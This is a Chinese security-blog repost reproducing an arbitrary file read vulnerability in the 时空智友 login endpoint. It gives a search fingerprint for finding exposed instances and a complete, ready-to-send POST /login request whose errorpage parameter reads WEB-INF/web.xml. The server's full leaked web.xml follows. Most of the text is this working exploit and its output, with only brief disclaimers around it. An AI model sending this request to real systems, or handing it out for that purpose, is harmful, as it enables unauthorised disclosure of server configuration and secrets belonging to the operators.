【漏洞复现】时空智友漏洞Login任意文件读取

admin
admin
admin
138985
文章
114
评论
2024年5月14日23:20:42评论80 views字数 16979阅读56分35秒阅读模式

声明

该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

资产收集

web.icon=="2464cbce5dd2681dd4fb62d055520d78"

【漏洞复现】时空智友漏洞Login任意文件读取

漏洞复现

【漏洞复现】时空智友漏洞Login任意文件读取

构造请求

POST /login HTTP/1.1Host: Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=2FA8E20E8AD7DA8D9E894C85B1305755; __qypid=""Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 101op=verify%7Clogin&targetpage=&errorpage=WEB-INF/web.xml&mark=&tzo=480&username=admin&password=admin

【漏洞复现】时空智友漏洞Login任意文件读取

大致出现如下的返回包就是成功了

HTTP/1.1 200Server: nginxDate: Thu, 21 Sep 2023 06:36:03 GMTContent-Type: application/xmlConnection: closeSet-Cookie: JSESSIONID=80ECB18D62EF5F079077494813915E39; Path=/; HttpOnlyAccept-Ranges: bytesETag: W/"18123-1640592102000"Last-Modified: Mon, 27 Dec 2021 08:01:42 GMTContent-Length: 18123<?xml version="1.0" encoding="UTF-8"?><web-app id="WebApp_ID" version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">  <display-name>artery</display-name>  <welcome-file-list>    <welcome-file>index.html</welcome-file>    <welcome-file>index.jsp</welcome-file>  </welcome-file-list>  <listener>     <listener-class>com.artery.portal.listener.ServletContextListener</listener-class>  </listener>  <listener>    <listener-class>com.artery.portal.listener.HttpSessionListener</listener-class>  </listener>  <servlet>    <servlet-name>PortalDriverServlet</servlet-name>    <servlet-class>com.artery.portal.driver.PortalDriverServlet</servlet-class>    <init-param>      <param-name>charset</param-name>      <param-value>utf-8</param-value>    </init-param>  </servlet>  <servlet>    <servlet-name>ArteryPortlet</servlet-name>    <servlet-class>org.apache.pluto.container.driver.PortletServlet</servlet-class>    <init-param>      <param-name>portlet-name</param-name>      <param-value>ArteryPortlet</param-value>    </init-param>    <load-on-startup>1</load-on-startup>  </servlet>  <servlet>    <servlet-name>AdapterServlet</servlet-name>    <servlet-class>com.artery.adapters.AdapterServlet</servlet-class>    <load-on-startup>2</load-on-startup>  </servlet>  <servlet>    <servlet-name>PadService</servlet-name>    <servlet-class>com.artery.portal.PadService</servlet-class>  </servlet>  <servlet>    <servlet-name>MessageService</servlet-name>    <servlet-class>com.artery.portal.MessageDispatcher</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>MessageService</servlet-name>    <url-pattern>/message</url-pattern>  </servlet-mapping>  <servlet-mapping>    <servlet-name>PadService</servlet-name>    <url-pattern>/pad</url-pattern>  </servlet-mapping>  <servlet-mapping>    <servlet-name>PortalDriverServlet</servlet-name>    <url-pattern>/portal/*</url-pattern>  </servlet-mapping>  <servlet-mapping>    <servlet-name>ArteryPortlet</servlet-name>    <url-pattern>/PlutoInvoker/ArteryPortlet</url-pattern>  </servlet-mapping>  <!-- ##########portal################# -->  <servlet>    <servlet-name>formlocalizer</servlet-name>    <servlet-class>org.apache.pluto.container.driver.PortletServlet</servlet-class>    <init-param>      <param-name>portlet-name</param-name>      <param-value>formlocalizer</param-value>    </init-param>    <load-on-startup>1</load-on-startup>  </servlet>  <servlet-mapping>    <servlet-name>formlocalizer</servlet-name>    <url-pattern>/PlutoInvoker/formlocalizer</url-pattern>  </servlet-mapping>  <servlet>    <servlet-name>collection</servlet-name>    <servlet-class>org.apache.pluto.container.driver.PortletServlet</servlet-class>    <init-param>      <param-name>portlet-name</param-name>      <param-value>collection</param-value>    </init-param>    <load-on-startup>1</load-on-startup>  </servlet>  <servlet-mapping>    <servlet-name>collection</servlet-name>    <url-pattern>/PlutoInvoker/collection</url-pattern>  </servlet-mapping>  <!-- ########################### -->  <servlet>    <servlet-name>thtml</servlet-name>    <servlet-class>com.artery.portal.TemplateServlet</servlet-class>    <load-on-startup>1</load-on-startup>  </servlet>  <servlet-mapping>    <servlet-name>thtml</servlet-name>    <url-pattern>*.thtml</url-pattern>  </servlet-mapping>  <servlet>    <servlet-name>vhtml</servlet-name>    <servlet-class>com.artery.portal.TemplateServlet</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>vhtml</servlet-name>    <url-pattern>*.vhtml</url-pattern>  </servlet-mapping>  <servlet>    <servlet-name>formdispatcher</servlet-name>    <servlet-class>com.artery.form.FormServlet</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>formdispatcher</servlet-name>    <url-pattern>*.form</url-pattern>  </servlet-mapping>  <servlet>    <servlet-name>programdispatcher</servlet-name>    <servlet-class>com.artery.portal.ProgramDispatcher</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>programdispatcher</servlet-name>    <url-pattern>*.prog</url-pattern>  </servlet-mapping>  <servlet>    <servlet-name>formservice</servlet-name>    <servlet-class>com.artery.form.FormService</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>formservice</servlet-name>    <url-pattern>/formservice/*</url-pattern>  </servlet-mapping>  <servlet>    <servlet-name>login</servlet-name>    <servlet-class>com.artery.portal.LoginServlet</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>login</servlet-name>    <url-pattern>/login/*</url-pattern>  </servlet-mapping>  <servlet>    <servlet-name>verifycode</servlet-name>    <servlet-class>com.artery.portal.util.VerifyCodeGenerator</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>verifycode</servlet-name>    <url-pattern>/verifycode/*</url-pattern>  </servlet-mapping>  <servlet>    <servlet-name>workflow</servlet-name>    <servlet-class>com.artery.workflow.WorkflowServlet</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>workflow</servlet-name>    <url-pattern>*.workflow</url-pattern>  </servlet-mapping>  <servlet>    <servlet-name>template</servlet-name>    <servlet-class>com.artery.km.TemplateServlet</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>template</servlet-name>    <url-pattern>*.vm</url-pattern>  </servlet-mapping>  <servlet-mapping>    <servlet-name>template</servlet-name>    <url-pattern>*.do</url-pattern>  </servlet-mapping>  <servlet>    <servlet-name>img</servlet-name>    <servlet-class>com.artery.form.ImageServlet</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>img</servlet-name>    <url-pattern>*.img</url-pattern>  </servlet-mapping>  <servlet-mapping>    <servlet-name>img</servlet-name>    <url-pattern>/attachment/*</url-pattern>  </servlet-mapping>  <servlet-mapping>    <servlet-name>img</servlet-name>    <url-pattern>/attachments/*</url-pattern>  </servlet-mapping>  <servlet>    <servlet-name>thumbnail</servlet-name>    <servlet-class>com.artery.form.ImageServlet</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>thumbnail</servlet-name>    <url-pattern>/thumbnail/*</url-pattern>  </servlet-mapping>  <servlet>    <servlet-name>thumbm</servlet-name>    <servlet-class>com.artery.form.ImageServlet</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>thumbm</servlet-name>    <url-pattern>/thumbm/*</url-pattern>  </servlet-mapping>  <servlet>    <servlet-name>thumbl</servlet-name>    <servlet-class>com.artery.form.ImageServlet</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>thumbl</servlet-name>    <url-pattern>/thumbl/*</url-pattern>  </servlet-mapping>  <servlet>    <servlet-name>thumbcutl</servlet-name>    <servlet-class>com.artery.form.ImageServlet</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>thumbcutl</servlet-name>    <url-pattern>/thumbcutl/*</url-pattern>  </servlet-mapping>  <!-- ###############auth认证#################### -->  <!-- server -->  <servlet>    <description>服务器端认证</description>    <servlet-name>authorization</servlet-name>    <servlet-class>com.qy960.oauth2server.servlets.Authorization</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>authorization</servlet-name>    <url-pattern>/oauth2/authorization</url-pattern>  </servlet-mapping>  <servlet>    <description>服务器端认证返回</description>    <servlet-name>authorizeresult</servlet-name>    <servlet-class>com.qy960.oauth2server.servlets.AuthorizationResult</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>authorizeresult</servlet-name>    <url-pattern>/oauth2/authorizationResult</url-pattern>  </servlet-mapping>  <servlet>    <description>服务器端认证AccessToken令牌</description>    <servlet-name>AccessToken</servlet-name>    <servlet-class>com.qy960.oauth2server.servlets.AccessToken</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>AccessToken</servlet-name>    <url-pattern>/oauth2/access_token</url-pattern>  </servlet-mapping>   <servlet>    <servlet-name>OauthLogin</servlet-name>    <servlet-class>com.qy960.oauth2server.servlets.Login</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>OauthLogin</servlet-name>    <url-pattern>/oauth2/login</url-pattern>  </servlet-mapping>     <servlet>    <servlet-name>OauthResetPwd</servlet-name>    <servlet-class>com.qy960.oauth2server.servlets.ResetPwd</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>OauthResetPwd</servlet-name>    <url-pattern>/oauth2/resetpwd</url-pattern>  </servlet-mapping>  <servlet>    <servlet-name>OauthThirdlogin</servlet-name>    <servlet-class>com.qy960.oauth2server.servlets.Thirdlogin</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>OauthThirdlogin</servlet-name>    <url-pattern>/oauth2/thirdlogin</url-pattern>  </servlet-mapping>  <servlet>    <servlet-name>OauthThirdRegister</servlet-name>    <servlet-class>com.qy960.oauth2server.servlets.ThirdRegister</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>OauthThirdRegister</servlet-name>    <url-pattern>/oauth2/thirdRegister</url-pattern>  </servlet-mapping>  <servlet>    <servlet-name>uploadServlet</servlet-name>    <servlet-class>com.artery.util.ServletUpload</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>uploadServlet</servlet-name>    <url-pattern>/upload/uploadimg</url-pattern>  </servlet-mapping>    <servlet>    <servlet-name>DetailOrderServlet</servlet-name>    <servlet-class>com.artery.util.DetailOrderServlet</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>DetailOrderServlet</servlet-name>    <url-pattern>/detail/detailorder</url-pattern>  </servlet-mapping>  <servlet>    <servlet-name>MemberRegisteServlet</servlet-name>    <servlet-class>com.artery.util.MemberRegisteServlet</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>MemberRegisteServlet</servlet-name>    <url-pattern>/member/memberregist</url-pattern>  </servlet-mapping>  <servlet>    <servlet-name>LoginwxServlet</servlet-name>    <servlet-class>com.artery.util.LoginwxServlet</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>LoginwxServlet</servlet-name>    <url-pattern>/getway/loginwz_new</url-pattern>  </servlet-mapping>      <!-- client -->  <servlet>    <description>客户端认证AccessToken令牌</description>    <servlet-name>ClientAccessToken</servlet-name>    <servlet-class>com.artery.qy.portal.oauth2.client.AccessToken</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>ClientAccessToken</servlet-name>    <url-pattern>/oauth2/client/accesstoken</url-pattern>  </servlet-mapping>  <!-- 卡充值 -->  <servlet>    <servlet-name>carpackageServlet</servlet-name>    <servlet-class>com.artery.util.carpackageServlet</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>carpackageServlet</servlet-name>    <url-pattern>/artery/util/carpackageServlet</url-pattern>  </servlet-mapping>  <servlet>    <servlet-name>CarpayServlet</servlet-name>    <servlet-class>com.artery.util.CarpayServlet</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>CarpayServlet</servlet-name>    <url-pattern>/artery/util/CarpayServlet</url-pattern>  </servlet-mapping>  <servlet>    <servlet-name>CarqrypeopleServlet</servlet-name>    <servlet-class>com.artery.util.CarqrypeopleServlet</servlet-class>  </servlet>  <servlet-mapping>    <servlet-name>CarqrypeopleServlet</servlet-name>    <url-pattern>/artery/util/CarqrypeopleServlet</url-pattern>  </servlet-mapping>  <servlet>      <servlet-name>ArteryAxisServlet</servlet-name>      <display-name>ArteryAxisServlet</display-name>      <servlet-class>          org.apache.axis.transport.http.AxisServlet      </servlet-class>    </servlet>     <servlet-mapping>    <servlet-name>ArteryAxisServlet</servlet-name>    <url-pattern>/services/*</url-pattern>  </servlet-mapping>  <servlet>    <servlet-name>rest-invoker</servlet-name>    <servlet-class>com.artery.rest.RestService</servlet-class>    <init-param>      <param-name>rest-config</param-name>      <param-value>/rests.xml</param-value>    </init-param>  </servlet>  <!-- Mapping -->  <servlet-mapping>    <servlet-name>rest-invoker</servlet-name>    <url-pattern>/rest/*</url-pattern>  </servlet-mapping>  <!-- ###############auth认证#################### -->  <filter>    <filter-name>ArterySecurity</filter-name>    <filter-class>com.artery.security.ContentFilter</filter-class>  </filter>  <filter-mapping>    <filter-name>ArterySecurity</filter-name>    <url-pattern>/login/*</url-pattern>  </filter-mapping>  <filter-mapping>    <filter-name>ArterySecurity</filter-name>    <url-pattern>/oauth2/*</url-pattern>  </filter-mapping>  <filter-mapping>    <filter-name>ArterySecurity</filter-name>    <url-pattern>*.vhtml</url-pattern>  </filter-mapping>  <filter-mapping>    <filter-name>ArterySecurity</filter-name>    <url-pattern>*.form</url-pattern>  </filter-mapping>  <filter-mapping>    <filter-name>ArterySecurity</filter-name>    <url-pattern>*.prog</url-pattern>  </filter-mapping>  <filter-mapping>    <filter-name>ArterySecurity</filter-name>    <url-pattern>*.jsp</url-pattern>  </filter-mapping>  <filter>    <filter-name>ArteryFilter</filter-name>    <filter-class>com.artery.portal.filters.ArteryFilter</filter-class>  </filter>  <filter-mapping>    <filter-name>ArteryFilter</filter-name>    <url-pattern>/*</url-pattern>  </filter-mapping>  <filter>    <filter-name>GetWeixAppidFilter</filter-name>    <filter-class>com.artery.portal.filters.GetWeixAppidFilter</filter-class>  </filter>  <filter-mapping>    <filter-name>GetWeixAppidFilter</filter-name>    <url-pattern>/oauth2/*</url-pattern>  </filter-mapping>    <filter-mapping>    <filter-name>GetWeixAppidFilter</filter-name>    <url-pattern>/login/*</url-pattern>  </filter-mapping>  <filter>    <filter-name>protalfilter</filter-name>    <filter-class>com.artery.portal.PortalFilter</filter-class>  </filter>  <filter-mapping>    <filter-name>protalfilter</filter-name>    <url-pattern>*.prog</url-pattern>  </filter-mapping>  <filter-mapping>    <filter-name>protalfilter</filter-name>    <url-pattern>*.form</url-pattern>  </filter-mapping>  <filter-mapping>    <filter-name>protalfilter</filter-name>    <url-pattern>*.workflow</url-pattern>  </filter-mapping>  <filter-mapping>    <filter-name>protalfilter</filter-name>    <url-pattern>*.thtml</url-pattern>  </filter-mapping>  <filter-mapping>    <filter-name>protalfilter</filter-name>    <url-pattern>*.vhtml</url-pattern>  </filter-mapping>  <filter-mapping>    <filter-name>protalfilter</filter-name>    <url-pattern>*.jsp</url-pattern>  </filter-mapping>  <filter>    <filter-name>EntAuthorizationFilter</filter-name>    <filter-class>com.artery.portal.EntAuthorizationFilter</filter-class>    <init-param>      <param-name>entids</param-name>      <param-value>E0IJ58MFKKXG,2016-06-29</param-value>    </init-param>  </filter>  <filter-mapping>    <filter-name>EntAuthorizationFilter</filter-name>    <url-pattern>*.prog</url-pattern>  </filter-mapping>  <filter>    <filter-name>WEBAuthorizationFilter</filter-name>    <filter-class>com.artery.portal.filters.WEBAuthorizationFilter</filter-class>  </filter>  <filter-mapping>    <filter-name>WEBAuthorizationFilter</filter-name>    <url-pattern>/formservice</url-pattern>  </filter-mapping>  <session-config>    <session-timeout>300</session-timeout>  </session-config>  <jsp-config>    <taglib>      <taglib-uri>http://java.sun.com/portlet</taglib-uri>      <taglib-location>/WEB-INF/tld/portlet.tld</taglib-location>    </taglib>    <taglib>      <taglib-uri>http://portals.apache.org/pluto/portlet-el</taglib-uri>      <taglib-location>/WEB-INF/tld/portlet-el.tld</taglib-location>    </taglib>    <taglib>      <taglib-uri>http://portals.apache.org/pluto</taglib-uri>      <taglib-location>/WEB-INF/tld/pluto.tld</taglib-location>    </taglib>      <taglib>        <taglib-uri>http://race.qy960.com</taglib-uri>        <taglib-location>/WEB-INF/qy960.tld</taglib-location>      </taglib>      <taglib>        <taglib-uri>http://race.qy960.com/race</taglib-uri>        <taglib-location>/WEB-INF/race.tld</taglib-location>      </taglib>  </jsp-config>  <error-page>    <error-code>401</error-code>    <location>/WEB-INF/jsps/error401.jsp</location>  </error-page>  <error-page>    <error-code>404</error-code>    <location>/WEB-INF/jsps/error404.jsp</location>  </error-page>  <error-page>    <exception-type>java.lang.Exception</exception-type>    <location>/WEB-INF/jsps/error.jsp</location>  </error-page>  <security-constraint>    <web-resource-collection>      <web-resource-name>Artery Manager</web-resource-name>      <url-pattern>/setup/*</url-pattern>    </web-resource-collection>    <auth-constraint>      <role-name>manager</role-name>    </auth-constraint>  </security-constraint>  <!-- Define the Login Configuration for this Application -->  <login-config>    <auth-method>BASIC</auth-method>    <realm-name>Artery Manager Application</realm-name>  </login-config>  <!-- Security roles referenced by this web application -->  <security-role>    <description>      The role that is required to log in to the Manager Application      </description>    <role-name>manager</role-name>  </security-role>  <filter>    <filter-name>eaiTokenFilter</filter-name>    <filter-class>zyservice.eai.token.CheckTokenFilter</filter-class>  </filter>  <filter-mapping>    <filter-name>eaiTokenFilter</filter-name>    <url-pattern>/rest/eai/*</url-pattern>  </filter-mapping></web-app>

原文始发于微信公众号(Devil安全):【漏洞复现】时空智友漏洞Login任意文件读取

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月14日23:20:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】时空智友漏洞Login任意文件读取https://cn-sec.com/archives/2058511.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息